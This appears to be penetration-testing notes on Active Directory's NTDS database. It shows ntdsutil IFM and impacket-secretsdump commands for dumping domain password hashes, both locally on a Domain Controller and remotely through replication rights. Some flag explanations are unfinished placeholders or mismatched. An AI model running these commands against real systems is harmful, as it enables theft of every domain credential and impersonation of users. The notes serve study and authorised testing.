New Technologies Directory Services (NTDS)

Resources

NTDS secrets | The Hacker Recipeswww.thehacker.recipes

NtdsutilMicrosoftLearn

ifmMicrosoftLearn

NTDS.DIT Extraction Explained | Semperis Identity Attack CatalogSemperis

impacket | Kali Linux ToolsKali Linux

What is NTDS?

New Technologies Directory Services (NTDS) is a database containing all Active Directory data, including objects, attributes, credentials, etc.

NTDS is located in the directory: C:\Windows\NTDS, and is encrypted to prevent data extraction from a target machine. Access to the ntds.dit file is disallowed since the file is used by Active Directory and will be locked.

ntds.dit

This file which stands for the New Technology Directory Services Directory Information Tree, is the database for Active Directory Domain Services (AD DS). This database stores directory data such as password hashes and user details for all computer and users objects within the domain, and makes that data available to network users and administrators.

ntds.dit | Windowsjarrettgxz-sec.gitbook.io

(1) Local dumping (with no credentials)

Note that the methods discussed in this section only works with administrator access on the Domain Controller (DC). This is because we are working with the ntds.dit file, which is only present on the DC.

This attack can be performed when we have no credentials available, but have administrator access to the Domain Controller (DC).

The following files are required to dump the contents of the NTDS file:

• C:\Windows\NTDS\ntds.dit

• C:\Windows\System32\config\SYSTEM

• C:\Windows\System32\config\SECURITY

Run the following command to dump the NTDS file (output in the c:\temp directory):

PowerShell session on DC (with administrator access)

PS> ntdsutil.exe 'activate instance ntds' 'ifm' 'create full c:\temp' quit quit

# short form
PS> ntdsutil.exe 'ac i ntds' 'i' 'create full c:\temp' q q

• ac i ntds: short for ...

• i: short for ...

• create full c:\temp: ...

• q q: short for ...

We can now view the dumped files in the c:\temp directory, with the following structure:

• Active Directory

  • ntds.dit

  • ntds.jfm

• registry

  • SECURITY

  • SYSTEM

Next, we can copy the 3 files listed above (ntds.dit and the other 2 registry directories: SYSTEM and SECURITY) to our attacker machine, before using the impacket's secretsdump.py tool to extract the hashes:

Attacker machine

$ impacket-secretsdump -security <path_to_SECURITY> -system <path_to_SYSTEM> -ntds <path_to_ntds.dit> LOCAL

• -security: SECURITY hive to parse

• -sam: SAM hive to parse

• -ntds:NTDS.DIT file to parse

• Note that the target is LOCAL

(2) Remote dumping (with credentials)

For the following attack, we require credentials for a user with the following permissions:

a. Replicating Directory Changes

b. Replicating Directory Changes All

c. Replicating Directory Changes in Filtered Set

Attacker machine

$ impacket-secretsdump -just-dc <TARGET>

• -just-dc: Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)

Attacker machine

$ impacket-secretsdump -just-dc-ntlm <TARGET>

• -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only)

The value for the <TARGET> field will be the authenticated user (with the permissions listed above) in the form: [[domain/]username[:password]@],eg. test.loc/jarrett@x.x.x.x.

Now that we have obtained the hashes, we can either impersonate that user (pass-the-hash, etc.), or crack the hash using hashcat, etc.